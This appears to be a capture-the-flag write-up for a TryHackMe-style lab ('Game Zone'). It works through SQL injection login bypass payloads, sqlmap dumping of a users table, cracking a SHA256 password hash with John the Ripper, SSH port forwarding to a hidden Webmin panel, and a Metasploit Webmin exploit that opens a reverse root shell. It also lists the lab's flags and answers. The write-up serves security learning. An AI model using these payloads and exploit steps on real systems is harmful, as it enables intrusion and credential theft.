[Deploy the vulnerable machine]

[*] Target: 10.10.146.88

[Question 1] What is the name of the large cartoon avatar holding a sniper on the forum? => Agent 47

    [+] In the http://10.10.146.88/, you can see a skinhead guy holding a gun, I already looked at the source code but can't found any realted information

        [>>] Using "Search image with Google", I found a realted result => "Hitman 2: Silent Assassin Walkthrough List of Missions"

        [>>] So I'm looking for all character's names in this game at https://www.giantbomb.com/hitman-2-silent-assassin/3030-7004/characters/

        [>>] Okay, so the guy in the image is Agent 47, he is an assassin


************************************************************************************************************************************************************************************************************************************************************


[Obtain access via SQLi]

[*] Target: 10.10.146.88

[Question 1] When you've logged in, what page do you get redirected to? => portal.php
 
    [+] Because I'm a super lazy boy, I wouldn't test the SQLi in the login form manually, I brute force it =))

        [>>] So you can find a SQLi login bypass wordlist in the https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet

            POST /index.php HTTP/1.1
            Host: 10.10.146.88
            User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 31
            Origin: http://10.10.146.88
            Connection: close
            Referer: http://10.10.146.88/index.php
            Cookie: PHPSESSID=025cdjon77jm3j9tsbnvl88ut4
            Upgrade-Insecure-Requests: 1

            username=§test§&password=&x=0&y=0

        [>>] This is some results that you can use to bypass this login form:
        
                [1] admin' or '1'='1'#
                
                [2] admin'or 1=1 or ''='
                
                [3] admin' or 1=1#

        [>>] After loging in, it redirects me to the http://10.10.146.88/portal.php


************************************************************************************************************************************************************************************************************************************************************

     
[Using SQLMap]

[*] Target: 10.10.146.88

[Question 1] In the users table, what is the hashed password? => ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

[Question 2] What was the username associated with the hashed password? => agent47

    [+] In this situation, the only place we can exploit is the search bar 

        POST /portal.php HTTP/1.1
        Host: 10.10.146.88
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 36
        Origin: http://10.10.146.88
        Connection: close
        Referer: http://10.10.146.88/portal.php
        Cookie: PHPSESSID=025cdjon77jm3j9tsbnvl88ut4
        Upgrade-Insecure-Requests: 1

        searchitem=thinhbeoprovipdeptrai2003

    # sqlmap -u 'http://10.10.146.88/portal.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'searchitem=thinhbeoprovipdeptrai2003*' -T users --dump --method POST -H "Cookie: PHPSESSID=025cdjon77jm3j9tsbnvl88ut4" --level=5 --risk=3

    [Note] I know, I know, you are looking at this and thinking that "What the fuck! Tryhackme doesn't give us this command"

        [?] -H 'Content-Type: application/x-www-form-urlencoded': This is a POST method in this is used to add Content-type header for the data

        [?] -H "Cookie: PHPSESSID=025cdjon77jm3j9tsbnvl88ut4": You need to login to see the search bar right, so add cookie is the way to confirm that this request is sent from an authenticated user
        
        ...
        Database: db
        Table: users
        [1 entry]
        +------------------------------------------------------------------+----------+
        | pwd                                                              | username |
        +------------------------------------------------------------------+----------+
        | ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
        +------------------------------------------------------------------+----------+

        [11:07:15] [INFO] table 'db.users' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.146.88/dump/db/users.csv'                                                                         
        [11:07:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.146.88'     

[Question 3] What was the other table name? => post

    # sqlmap -u 'http://10.10.146.88/portal.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'searchitem=thinhbeoprovipdeptrai2003*' --tables --method POST -H "Cookie: PHPSESSID=025cdjon77jm3j9tsbnvl88ut4" --level=5 --risk=3

        Database: information_schema
        [61 tables]
        +------------------------------------------------------+
        | CHARACTER_SETS                                       |
        | COLLATIONS                                           |
        |  ...                                                 |
        | USER_PRIVILEGES                                      |
        | VIEWS                                                |
        +------------------------------------------------------+

        Database: db
        [2 tables]
        +------------------------------------------------------+
        | post                                                 |
        | users                                                |
        +------------------------------------------------------+

        Database: mysql
        [31 tables]
        +------------------------------------------------------+
        | user                                                 |
        | columns_priv                                         |
        |  ...                                                 |
        | time_zone_transition                                 |
        | time_zone_transition_type                            |
        +------------------------------------------------------+

        Database: performance_schema
        [87 tables]
        +------------------------------------------------------+
        | accounts                                             |
        | cond_instances                                       |
        | ...                                                  |
        | users                                                |
        | variables_by_thread                                  |
        +------------------------------------------------------+

        Database: sys
        [101 tables]
        +------------------------------------------------------+
        | session                                              |
        | version                                              |
        | ...                                                  |
        | x$waits_by_user_by_latency                           |
        | x$waits_global_by_latency                            |
        +------------------------------------------------------+

    => Okay! So there are many tables, but I think in this case they just want us to looking for the tables that in the same database with users table => post


************************************************************************************************************************************************************************************************************************************************************

     
[Cracking a password with JohnTheRipper]

[*] Target: 10.10.146.88

[Question 1] What is the de-hashed password of agent47 ? => videogamer124

    [+] Using the hash identifier tool (https://hashes.com/en/tools/hash_identifier), they gave me this result:

        [>>] ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 - videogamer124 - Possible algorithms: SHA256

        [Note] Nah! I think we don't need to use John in this situation =)) But I sill want to you to know how to use JohnTheRipper

        # echo ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 > 47hash_pass.txt

        # john 47hash_pass.txt --wordlist=/usr/share/eaphammer/wordlists/rockyou.txt --format=Raw-SHA256

            Created directory: /home/bigbox/.john
            Using default input encoding: UTF-8
            Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
            Warning: poor OpenMP scalability for this hash type, consider --fork=6
            Will run 6 OpenMP threads
            Press 'q' or Ctrl-C to abort, almost any other key for status
            videogamer124    (?)  

[Question 2] Now you have a password and username. Try SSH'ing onto the machine. What is the user flag? => 649ac17b1480ac13ef1e4fa579dac95c

    # ssh agent47@10.10.146.88
        ...
        agent47@gamezone:~$ ls -al

            total 28
            drwxr-xr-x 3 agent47 agent47 4096 Aug 16  2019 .
            drwxr-xr-x 3 root    root    4096 Aug 14  2019 ..
            lrwxrwxrwx 1 root    root       9 Aug 16  2019 .bash_history -> /dev/null
            -rw-r--r-- 1 agent47 agent47  220 Aug 14  2019 .bash_logout
            -rw-r--r-- 1 agent47 agent47 3771 Aug 14  2019 .bashrc
            drwx------ 2 agent47 agent47 4096 Aug 16  2019 .cache
            -rw-r--r-- 1 agent47 agent47  655 Aug 14  2019 .profile
            -rw-rw-r-- 1 agent47 agent47   33 Aug 16  2019 user.txt
        
        agent47@gamezone:~$ cat user.txt
        
            649ac17b1480ac13ef1e4fa579dac95c


************************************************************************************************************************************************************************************************************************************************************


[Exposing services with reverse SSH tunnels]

[*] Target: 10.10.146.88

[Question 1] How many TCP sockets are running? => 5

    agent47@gamezone:~$ ss -tulp

        Netid  State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port                
        udp    UNCONN     0      0               *:bootpc                        *:*                    
        udp    UNCONN     0      0               *:10000                         *:*                    
        tcp    LISTEN     0      80      127.0.0.1:mysql                         *:*                    
        tcp    LISTEN     0      128             *:webmin                        *:*                    
        tcp    LISTEN     0      128             *:ssh                           *:*                    
        tcp    LISTEN     0      128            :::http                         :::*                    
        tcp    LISTEN     0      128            :::ssh                          :::*                    
    
    agent47@gamezone:~$ ss -tulpn

        Netid  State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
        udp    UNCONN     0      0                 *:68                            *:*                  
        udp    UNCONN     0      0                 *:10000                         *:*                  
        tcp    LISTEN     0      80        127.0.0.1:3306                          *:*                  
        tcp    LISTEN     0      128               *:10000                         *:*                  
        tcp    LISTEN     0      128               *:22                            *:*                  
        tcp    LISTEN     0      128              :::80                           :::*                  
        tcp    LISTEN     0      128              :::22                           :::*                  

              [?] -t: Display TCP sockets

              [?] -u: Display UDP sockets

              [?] -l: Displays only listening sockets

              [?] -p: Shows the process using the socket

              [?] -n: Doesn't resolve service names

[Question 3] Port 10000 is blocked via a firewall rule from the outside. What is the name of the exposed CMS? => Webmin

[Question 4] What is the CMS version? => 1.580

    # ssh -L 1234:localhost:10000 agent47@10.10.250.32

        [?] -L 1234:localhost:10000: Specifies local port forwarding. It means that any traffic sent to port 1234 on your local machine will be forwarded to the same port (10000) on the remote server.

    [+] So now, in the http://127.0.0.1:1234/, we can see a "Login to Webmin" page, you can login with this using the SSH credential

        =>  System hostname	gamezone (127.0.1.1)
            Operating system	Ubuntu Linux 16.04.6
            Webmin version	1.580
            Time on system	Tue Jul 11 06:06:18 2023
            Kernel and CPU	Linux 4.4.0-159-generic on x86_64
            Processor information	Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz, 1 cores
            System uptime	1 hours, 47 minutes
            Running processes	117
            CPU load averages	0.00 (1 min) 0.00 (5 mins) 0.00 (15 mins)
            CPU usage	0% user, 0% kernel, 0% IO, 100% idle
            Real memory	1.95 GB total, 260.23 MB used


************************************************************************************************************************************************************************************************************************************************************


[Privilege Escalation with Metasploit]

[*] Target: 10.10.146.88

[Question 1] What is the flag in root.txt?

    msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options

    Module options (exploit/unix/webapp/webmin_show_cgi_exec):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    PASSWORD  videogamer124    yes       Webmin Password
    Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS    127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
                                            l
    RPORT     1234             yes       The target port (TCP)
    SSL       false            yes       Use SSL
    USERNAME  agent47          yes       Webmin Username
    VHOST                      no        HTTP server virtual host


    Payload options (cmd/unix/reverse):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST  10.14.56.1       yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port


    Exploit target:

    Id  Name
    --  ----
    0   Webmin 1.580



    View the full module info with the info, or info -d command.

    msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run

    [*] Started reverse TCP double handler on 10.14.56.1:4444 
    [*] Attempting to login...
    [+] Authentication successful
    [+] Authentication successful
    ....
    [*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n"
    [*] Matching...
    [*] B is input...
    [*] Command shell session 1 opened (10.14.56.1:4444 -> 10.10.250.32:51626) at 2023-07-11 19:57:36 +0800


    Shell Banner:
    CaDz1haLi6ZKMGEL
    -----

    >> whoami
       root
    
    >> locate root.txt
       /root/root.txt
    
    >> cat /root/root.txt
       a4b945830144bdd71908d12d902adeee
